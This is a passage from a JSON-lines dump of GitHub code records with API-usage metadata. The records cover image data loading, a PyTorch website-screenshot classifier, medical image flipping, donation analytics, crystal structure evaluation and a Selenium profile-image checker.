"hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 159, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 160, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_data_loaded", "line_number": 165, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 141, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.Client", "line_number": 171, "usage_type": "name"}, {"api_name": "hca_orchestration.tests.support.bigquery.exec_query", "line_number": 176, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.query_metadata_table", "line_number": 179, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.query_metadata_table", "line_number": 182, "usage_type": "call"}]} +{"seq_id": "29309915885", "text": "import os\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\nplt.rcParams['figure.figsize'] = (5.0, 4.0) # set default size of plots\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\n\nfrom nn import *\n\ndef load_data():\n\n\ttrain_x_pos_path = 'data/training/pos'\n\ttrain_x_neg_path = 'data/training/neg'\n\n\ttest_x_pos_path = 'data/testing/pos'\n\ttest_x_neg_path = 'data/testing/neg'\n\n\ttrain_x_pos = read_images(train_x_pos_path)\n\ttrain_x_neg = read_images(train_x_neg_path)\n\n\ttrain_y_pos = [1 for i in range(len(train_x_pos))]\n\ttrain_y_neg = [0 for i in range(len(train_x_neg))]\n\n\ttrain_x = np.array(train_x_pos + train_x_neg)\n\ttrain_y = np.array(train_y_pos + train_y_neg)\n\n\ttest_x_pos = read_images(test_x_pos_path)\n\ttest_x_neg = read_images(test_x_neg_path)\n\n\ttest_y_pos = [1 for i in range(len(test_x_pos))]\n\ttest_y_neg = [0 for i in range(len(test_x_neg))]\n\n\ttest_x = np.array(test_x_pos + test_x_neg)\n\ttest_y = np.array(test_y_pos + test_y_neg)\n\n\tclasses = np.array(['non-face', 'face'])\n\n\ttrain_y = np.reshape(train_y, (1, len(train_y)))\n\ttest_y = np.reshape(test_y, (1, len(test_y)))\n\n\treturn train_x, train_y, test_x, test_y, classes\n\n\ndef read_images(path):\n\n\tres = []\n\tfor file in os.listdir(path):\n\n\t\ttry:\n\t\t\timg = cv2.imread(os.path.join(path, file), cv2.IMREAD_GRAYSCALE)\n\t\t\tres.append(img.copy())\n\t\texcept:\n\t\t\tcontinue\n\n\treturn res\n\n\ndef preprocessing(train_x_orig, train_y, test_x_orig, test_y, classes=None):\n\n\t# train_x_orig, train_y, test_x_orig, test_y, classes = load_data()\n\n\t# print train_x_orig.shape\n\n\n\tm_train = train_x_orig.shape[0]\n\tm_test = test_x_orig.shape[0]\n\n\tnum_px = train_x_orig.shape[1]\n\n\tprint (\"Number of training examples: \" + str(m_train))\n\tprint (\"Number of testing examples: \" + str(m_test))\n\tprint (\"Each image is of size: (\" + str(num_px) + \", \" + str(num_px) + \", 3)\")\n\tprint (\"train_x_orig shape: \" + str(train_x_orig.shape))\n\tprint (\"train_y shape: \" + str(train_y.shape))\n\tprint (\"test_x_orig shape: \" + str(test_x_orig.shape))\n\tprint (\"test_y shape: \" + str(test_y.shape))\n\n\t# reshape and standardize the images before feeding to the network\n\n\ttrain_x_flatten = train_x_orig.reshape(train_x_orig.shape[0], -1).T # The \"-1\" makes reshape flatten the remaining dimensions\n\ttest_x_flatten = test_x_orig.reshape(test_x_orig.shape[0], -1).T\n\n\t# Standardize data to have feature values between 0 and 1.\n\ttrain_x = train_x_flatten/255.\n\ttest_x = test_x_flatten/255.\n\n\tprint (\"train_x's shape: \" + str(train_x.shape))\n\tprint (\"test_x's shape: \" + str(test_x.shape))\n\n\treturn train_x, train_y, test_x, test_y", "repo_name": "kylin-zhuo/AI-Expert", "sub_path": "DeepLearning/nn/load.py", "file_name": "load.py", "file_ext": "py", "file_size_in_byte": 2593, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 6, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 6, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 7, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 8, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 42, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 53, "usage_type": "attribute"}]} +{"seq_id": "15571340759", "text": "import os, sys, random, copy, time\nimport torch\nimport argparse\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nfrom torchvision import transforms\nfrom torchvision import models\nimport torchvision.datasets as dset\n\nfrom utils.utils import get_model_path, print_log, manipulate_net_architecture\nfrom utils.utils import convert_secs2time, time_string\nfrom utils.training import adjust_learning_rate, train_model, validate, save_checkpoint\nfrom utils.training import RecorderMeter, AverageMeter\n\nfrom config.config import WEBSITES_DATASET_PATH\n\nLABELS = [\"Homepage\", \"Login Page\", \"Not Found\", \"Old Looking\"]\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description='Eyeballer')\n parser.add_argument('--test-dir', type=str, required=True,\n help='Folder containing the images to test')\n parser.add_argument('--arch', default='vgg16', choices=['vgg16', 'vgg19','resnet18', 'resnet50', 'resnet101', 'resnet152'],\n help='Model architecture: (default: vgg16)')\n parser.add_argument('--seed', type=int, default=111,\n help='Seed used (default: 111)')\n parser.add_argument('--batch-size', type=int, default=32,\n help=\"Batch size (default: 32)\")\n parser.add_argument('--workers', type=int, default=6,\n help='Number of data loading workers (default: 6)')\n args = parser.parse_args()\n\n args.use_cuda = torch.cuda.is_available()\n\n return args\n\ndef main():\n args = parse_arguments()\n\n random.seed(args.seed)\n cudnn.benchmark = True\n\n model_path = get_model_path('websites', args.arch, args.seed)\n\n # Data specifications for the webistes dataset\n mean = [0., 0., 0.]\n std = [1., 1., 1.]\n input_size = 224\n num_classes = 4\n\n # Dataset\n test_transform = transforms.Compose([\n transforms.Resize(input_size),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)])\n data_test = dset.ImageFolder(root=args.test_dir, transform=test_transform)\n\n # Dataloader\n data_test_loader = torch.utils.data.DataLoader(data_test,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.workers,\n pin_memory=True)\n\n # Network\n if args.arch == \"vgg16\":\n net = models.vgg16(pretrained=True)\n elif args.arch == \"vgg19\":\n net = models.vgg19(pretrained=True)\n elif args.arch == \"resnet18\":\n net = models.resnet18(pretrained=True)\n elif args.arch == \"resnet50\":\n net = models.resnet50(pretrained=True)\n elif args.arch == \"resnet101\":\n net = models.resnet101(pretrained=True)\n elif args.arch == \"resnet152\":\n net = models.resnet152(pretrained=True)\n else:\n raise ValueError(\"Network {} not supported\".format(args.arch))\n\n if num_classes != 1000:\n net = manipulate_net_architecture(model_arch=args.arch, net=net, num_classes=num_classes)\n \n # Loading the checkpoint\n net.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pth.tar'))['state_dict'])\n net.eval()\n\n # Cuda\n if args.use_cuda:\n net.cuda()\n\n for idx, (img, _) in enumerate(data_test_loader):\n if args.use_cuda:\n img = img.cuda()\n with torch.no_grad():\n pred = torch.argmax(net(img), dim=-1)\n \n samples = data_test.samples[idx*args.batch_size:(idx+1)*args.batch_size]\n for idx2, sample in enumerate(samples):\n label_idx = pred[idx2].cpu().detach().numpy()\n label = LABELS[label_idx]\n print(\"{} - {} - {}\".format(sample[0], label , label_idx))\n \nif __name__ == '__main__':\n main()\n", "repo_name": "phibenz/eyeballer.pytorch", "sub_path": "eyeballer.py", "file_name": "eyeballer.py", "file_ext": "py", "file_size_in_byte": 3853, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 33, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 41, "usage_type": "name"}, {"api_name": "utils.utils.get_model_path", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 52, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 52, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 53, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 53, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 54, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 54, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 55, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 55, "usage_type": "name"}, {"api_name": "torchvision.datasets.ImageFolder", "line_number": 56, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torchvision.models.vgg16", "line_number": 67, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 67, "usage_type": "name"}, {"api_name": "torchvision.models.vgg19", "line_number": 69, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 69, "usage_type": "name"}, {"api_name": "torchvision.models.resnet18", "line_number": 71, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 71, "usage_type": "name"}, {"api_name": "torchvision.models.resnet50", "line_number": 73, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 73, "usage_type": "name"}, {"api_name": "torchvision.models.resnet101", "line_number": 75, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 75, "usage_type": "name"}, {"api_name": "torchvision.models.resnet152", "line_number": 77, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 77, "usage_type": "name"}, {"api_name": "utils.utils.manipulate_net_architecture", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "28534813731", "text": "from PIL import Image\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\n# method – One of PIL.Image.FLIP_LEFT_RIGHT, PIL.Image.FLIP_TOP_BOTTOM, PIL.Image.ROTATE_90, \r\n# PIL.Image.ROTATE_180, PIL.Image.ROTATE_270 or PIL.Image.TRANSPOSE.\r\nfor i in range(68,80):\r\n\tif os.path.exists(\"../raw data/lits/NII/volume/volume-{}.nii\".format(i)):\r\n\t\tprint('----------',i,'-----------') \r\n\t\tnumber_of_instance = len(os.listdir('../data/data/{}/gt/'.format(i)))\r\n\t\tfor idx in range(number_of_instance):\r\n\t\t\t# idx = 10\r\n\t\t\timage = Image.open('../data/data/{}/img/{}.png'.format(i,idx), mode='r')\r\n\t\t\timage = image.convert(\"L\")\r\n\t\t\tgt = Image.open('../data/data/{}/gt/{}.png'.format(i,idx), mode='r')\r\n\t\t\tgt = gt.convert(\"L\")\r\n\t\t\t# image = image.transpose(Image.FLIP_TOP_BOTTOM)\r\n\t\t\t# gt = gt.transpose(Image.FLIP_TOP_BOTTOM)\r\n\t\t\timage = image.transpose(Image.FLIP_LEFT_RIGHT)\r\n\t\t\tgt = gt.transpose(Image.FLIP_LEFT_RIGHT)\r\n\t\t\t# plt.imshow(np.array(image.getdata()).reshape((512,512)),cmap='gray')\r\n\t\t\t# plt.axis('off')\r\n\t\t\t# plt.show()\r\n\t\t\t# plt.imshow(np.array(gt.getdata()).reshape((512,512)),cmap='gray')\r\n\t\t\t# plt.axis('off')\r\n\t\t\t# plt.show()\r\n\t\t\timage.save('../data/data/{}/img/{}.png'.format(i,idx))\r\n\t\t\tgt.save('../data/data/{}/gt/{}.png'.format(i,idx))\r\n\t\t\r\n\r\n\r\n", "repo_name": "AnsenHuang14/3D-Medical-Image-Segmentation", "sub_path": "data processing/image_flip.py", "file_name": "image_flip.py", "file_ext": "py", "file_size_in_byte": 1274, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.exists", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 14, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 14, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 16, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 20, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 20, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 21, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "29219687732", "text": "import argparse\nimport os\nfrom donation_analytics_validations import *\nfrom donation_analytics_process import *\n\ndef main():\n # Parses command line arguments for the paths\n parser = argparse.ArgumentParser(description='Parses the path for the percentile file and the contributions file.')\n parser.add_argument('contributions_path')\n parser.add_argument('percentile_path')\n parser.add_argument('output_path')\n args = parser.parse_args()\n\n # If the repeat_donors.txt already exists, remove it first\n try:\n os.remove(args.output_path)\n except OSError:\n pass\n\n percentile = read_percentile(args.percentile_path)\n input_stream = read_data(args.contributions_path)\n\n donors = {}\n contributions = {}\n\n for line in input_stream:\n record = validate_record(line)\n\n if not record:\n continue\n\n record = check_repeat_donor(record, donors)\n\n if record:\n update_contributions(record, contributions)\n result = generate_result(record, contributions, percentile)\n write_output(args.output_path, result)\n\n input_stream.close()\n\nif __name__ == '__main__':\n main()", "repo_name": "victorou22/donation-analytics", "sub_path": "src/donation_analytics_driver.py", "file_name": "donation_analytics_driver.py", "file_ext": "py", "file_size_in_byte": 1177, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "72367623846", "text": "import pickle\nfrom logging import getLogger\nfrom pathlib import Path\n\nimport hydra\nimport numpy as np\nimport torch\nfrom torch_geometric.nn import nearest\n\nfrom mp_dataset import MPDatasetDataModule\nfrom utils import extract_lattice\n\nlogger = getLogger(__name__)\n\n\ndef evaluate_entry(\n true_data,\n pred_data,\n log_f=None,\n):\n true_pos = true_data.pos\n true_spec = true_data.x.flatten()\n true_length, true_angle = extract_lattice(true_data)\n\n pred_pos = pred_data.pos\n pred_spec = pred_data.x.flatten()\n pred_length, pred_angle = extract_lattice(pred_data)\n\n # compute distance error\n num_true_points = true_pos.shape[0]\n num_pred_points = pred_pos.shape[0]\n\n ext_true_pos = true_pos.view(1, num_true_points, 3).repeat(num_pred_points, 1, 1)\n ext_pred_pos = pred_pos.view(num_pred_points, 1, 3).repeat(1, num_true_points, 1)\n diff = ext_true_pos - ext_pred_pos\n dists = diff.pow(2).sum(dim=2)\n dists = dists.sqrt()\n # dists: (num_pred_points(detected), num_true_points(exist))\n\n if num_pred_points > 0:\n dists_exist, _ = dists.min(dim=0)\n else:\n dists_exist = torch.ones((num_true_points,), dtype=torch.float32) * np.inf\n\n if num_true_points > 0:\n dists_detected, _ = dists.min(dim=1)\n else:\n logger.warning(\"something wrong in dataset\")\n dists_detected = torch.ones((num_pred_points,), dtype=torch.float32) * np.inf\n\n position_error_exist = dists_exist\n position_error_detected = dists_detected\n\n num_atom_correct = true_pos.shape[0] == pred_pos.shape[0]\n\n # compute spec error\n\n if num_pred_points > 0:\n nearest_idx = nearest(pred_pos, true_pos)\n compare_true_spec = true_spec[nearest_idx]\n\n nearest_idx = nearest(true_pos, pred_pos)\n compare_pred_spec = pred_spec[nearest_idx]\n else:\n compare_true_spec = torch.ones(pred_spec.shape, dtype=torch.int64) * -1\n compare_pred_spec = torch.ones(true_spec.shape, dtype=torch.int64) * -1\n\n species_correct_detected = compare_true_spec == pred_spec\n species_correct_exist = true_spec == compare_pred_spec\n\n length_error = torch.abs(true_length - pred_length).flatten()\n angle_error = torch.abs(true_angle - pred_angle).flatten() * 180 / np.pi\n\n retval = {\n \"num_atom_correct\": num_atom_correct,\n \"position_error_exist\": position_error_exist,\n \"position_error_detected\": position_error_detected,\n \"species_correct_exist\": species_correct_exist,\n \"species_correct_detected\": species_correct_detected,\n \"length_error\": length_error,\n \"angle_error\": angle_error,\n }\n\n if log_f is not None:\n # write log\n log_f.write(f\"num_atom_exist: {num_true_points}\\n\")\n log_f.write(f\"num_atom_detected: {num_pred_points}\\n\")\n log_f.write(f\"num_atom_correct: {num_atom_correct}\\n\")\n\n position_error_exist = float(position_error_exist.mean())\n position_error_detected = float(position_error_detected.mean())\n species_correct_exist = float(species_correct_exist.float().mean())\n species_correct_detected = float(species_correct_detected.float().mean())\n\n length_error = \", \".join(f\"{x.item():.4f}\" for x in length_error)\n angle_error = \", \".join(f\"{x.item():.4f}\" for x in angle_error)\n\n log_f.write(f\"position_error_exist: {position_error_exist:.4f}\\n\")\n log_f.write(f\"position_error_detected: {position_error_detected:.4f}\\n\")\n log_f.write(f\"species_correct_exist: {species_correct_exist*100:.4f}\\n\")\n log_f.write(f\"species_correct_detected: {species_correct_detected*100:.4f}\\n\")\n log_f.write(f\"length_error: {length_error}\\n\")\n log_f.write(f\"angle_error: {angle_error}\\n\")\n log_f.write(\"\\n\")\n\n return retval\n\n\ndef evaluate_dataset(dataset, reconstructed, split, log_f=None):\n num_atom_correct_list = []\n position_error_exist_list = []\n position_error_detected_list = []\n species_correct_exist_list = []\n species_correct_detected_list = []\n lattice_length_error_list = []\n lattice_angle_error_list = []\n\n for true_data in dataset:\n mpid = true_data[\"mpid\"]\n pred_data = reconstructed[mpid]\n\n if log_f is not None:\n log_f.write(f\"{mpid} (in {split})\\n\")\n\n retval = evaluate_entry(true_data, pred_data, log_f=log_f)\n\n num_atom_correct_list.append(retval[\"num_atom_correct\"])\n position_error_exist_list.append(retval[\"position_error_exist\"])\n position_error_detected_list.append(retval[\"position_error_detected\"])\n species_correct_exist_list.append(retval[\"species_correct_exist\"])\n species_correct_detected_list.append(retval[\"species_correct_detected\"])\n lattice_length_error_list.append(retval[\"length_error\"])\n lattice_angle_error_list.append(retval[\"angle_error\"])\n\n # write summary\n num_atom_correct = sum(num_atom_correct_list)\n num_atom_correct_ratio = num_atom_correct / len(dataset)\n\n position_error_exist = torch.cat(position_error_exist_list)\n position_error_exist = float(position_error_exist.mean())\n\n position_error_detected = torch.cat(position_error_detected_list)\n position_error_detected = float(position_error_detected.mean())\n\n species_correct_exist = torch.cat(species_correct_exist_list)\n species_correct_exist = float(species_correct_exist.float().mean())\n\n species_correct_detected = torch.cat(species_correct_detected_list)\n species_correct_detected = float(species_correct_detected.float().mean())\n\n length_error = torch.cat(lattice_length_error_list)\n length_error = float(length_error.mean())\n\n angle_error = torch.cat(lattice_angle_error_list)\n angle_error = float(angle_error.mean())\n\n summary_text = f\"\"\"Summary (in {split})\nnum_atom_correct_ratio: {num_atom_correct_ratio:.4f}\nposition_error_exist: {position_error_exist:.4f}\nposition_error_detected: {position_error_detected:.4f}\nspecies_correct_exist: {species_correct_exist*100:.4f}\nspecies_correct_detected: {species_correct_detected*100:.4f}\nlength_error: {length_error:.4f}\nangle_error: {angle_error:.4f}\n\"\"\"\n logger.info(summary_text)\n log_f.write(summary_text)\n\n return {\n \"num_atom_correct_ratio\": num_atom_correct_ratio,\n \"position_error_exist\": position_error_exist,\n \"position_error_detected\": position_error_detected,\n \"species_correct_exist\": species_correct_exist,\n \"species_correct_detected\": species_correct_detected,\n \"length_error\": length_error,\n \"angle_error\": angle_error,\n }\n\n\ndef evaluate_splits(\n data_module, reconstructed_data, splits, log_dir=None, postfix=\"trained\"\n):\n logger.info(f\"Dataset: {data_module.dataset_name}\")\n\n datasets = {\n \"train\": data_module.train_dataset,\n \"validation\": data_module.validation_dataset,\n \"test\": data_module.test_dataset,\n }\n\n logger.info(f\"Train dataset size: {len(datasets['train'])}\")\n logger.info(f\"Validation dataset size: {len(datasets['validation'])}\")\n logger.info(f\"Test dataset size: {len(datasets['test'])}\")\n\n result = dict()\n\n # evaluate\n for split in splits:\n assert split in datasets.keys()\n logger.info(f\"Split: {split}\")\n\n # get dataset\n dataset = datasets[split]\n logger.info(f\"Dataset size: {len(dataset)}\")\n\n # get reconstructed data\n reconstructed = reconstructed_data[split]\n logger.info(f\"Reconstructed data size: {len(reconstructed)}\")\n\n # check all data is reconstructed\n reconstructed_mpids = set(reconstructed.keys())\n assert len(dataset) == len(reconstructed)\n assert all(data[\"mpid\"] in reconstructed_mpids for data in dataset)\n\n # evaluate\n if log_dir is None:\n log_f = None\n else:\n log_dir.mkdir(parents=True, exist_ok=True)\n log_f = open(\n log_dir / f\"{data_module.dataset_name}_{split}_{postfix}.log\", mode=\"w\"\n )\n\n retval = evaluate_dataset(dataset, reconstructed, split, log_f=log_f)\n\n if log_f is not None:\n log_f.close()\n\n result[split] = retval\n\n # write summary\n return result\n\n\n@hydra.main(version_base=None, config_name=\"config\", config_path=\"./config\")\ndef main(config):\n log_dir = Path(config[\"evaluate\"][\"log_dir\"])\n log_dir.mkdir(parents=True, exist_ok=True)\n\n reconstructed_dir = Path(config[\"reconstruction\"][\"output_dir\"])\n\n # prepare dataset\n data_module = MPDatasetDataModule(**config[\"dataset\"], **config[\"data_module\"])\n\n # set reconstruction mode: trained or ground_truth\n mode = config[\"reconstruction\"].get(\"mode\", \"trained\")\n assert mode in [\"trained\", \"ground_truth\"]\n\n if mode == \"trained\":\n reconstructed_path = reconstructed_dir / f\"{data_module.dataset_name}.pkl\"\n elif mode == \"ground_truth\":\n reconstructed_path = (\n reconstructed_dir / f\"{data_module.dataset_name}_ground_truth.pkl\"\n )\n else:\n raise ValueError(f\"Invalid mode: {mode}\")\n\n # load reconstructed data\n with open(reconstructed_path, mode=\"rb\") as f:\n reconstructed_data = pickle.load(f)\n splits = reconstructed_data.keys()\n\n # evaluate\n results = evaluate_splits(\n data_module,\n reconstructed_data,\n splits,\n log_dir=log_dir,\n postfix=mode,\n )\n\n with open(log_dir / \"metrics.csv\", mode=\"a\") as f:\n for split, result in results.items():\n for k, v in result.items():\n f.write(f\"{data_module.dataset_name},{split},{k},{v}\\n\")\n logger.info(\"Done\")\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "omron-sinicx/neural-structure-field", "sub_path": "src/evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 9680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.extract_lattice", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.extract_lattice", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.ones", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.nearest", "line_number": 59, "usage_type": "call"}, {"api_name": "torch_geometric.nn.nearest", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.ones", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 66, "usage_type": "attribute"}, {"api_name": "torch.abs", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 154, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 237, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 240, "usage_type": "call"}, {"api_name": "mp_dataset.MPDatasetDataModule", "line_number": 243, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 260, "usage_type": "call"}, {"api_name": "hydra.main", "line_number": 235, "usage_type": "call"}]} +{"seq_id": "12520713980", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import *\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\n# chrome_options=Options()\n# chrome_options.add_argument(\"--headless\")\n# driver=webdriver.Chrome(options=chrome_options)\ndriver=webdriver.Firefox()\naction=ActionChains(driver)\ndriver.maximize_window()\ndriver.get(\"https://referloan.in\")\ndriver.implicitly_wait(10)\ntime.sleep(1)\nno_profile=open(\"No-Profile.txt\",'w')\ntry:\n for b in range(1,500):\n check=driver.find_element(By.XPATH,\"(//ul/li/a[@tabindex='-1'])[%d]\"%(b))\n check_text = driver.find_element(By.XPATH, \"(//ul/li/a[@tabindex='-1'])[%d]\" % (b)).text\n check_last=driver.find_element(By.XPATH,\"(//ul/li/a[@tabindex='-1'])[last()]\").text\n check_url=check.get_attribute('href')\n time.sleep(0.2)\n driver.get(check_url)\n driver.implicitly_wait(10)\n time.sleep(0.5)\n check_profile=driver.find_element(By.XPATH,\"//div[@class='CardImg_box']\").size\n if (check_profile[\"height\"]==214) and (check_profile[\"width\"]==340):\n continue\n else:\n driver.refresh()\n driver.implicitly_wait(10)\n time.sleep(0.5)\n check_profile = driver.find_element(By.XPATH, \"//div[@class='CardImg_box']\").size\n if (check_profile[\"height\"] == 214) and (check_profile[\"width\"] == 340):\n continue\n else:\n print(\"Profile Not Found in\",driver.find_element(By.XPATH, \"//span[contains(@style,'text-transform')]\").text)\n no_profile.write(\"Profile Not Found in \" + driver.find_element(By.XPATH,\"//span[contains(@style,'text-transform')]\").text)\n no_profile.write(\"\\n\")\nexcept:\n time.sleep(3)\n driver.close()\n", "repo_name": "pushkar718/Selenium-projects", "sub_path": "check-image/check-profile.py", "file_name": "check-profile.py", "file_ext": "py", "file_size_in_byte": 1844, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Firefox", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 11, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 19, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 19, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 21, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 21, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 27, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 27, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 33, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 34, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 34, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 38, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 38, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": 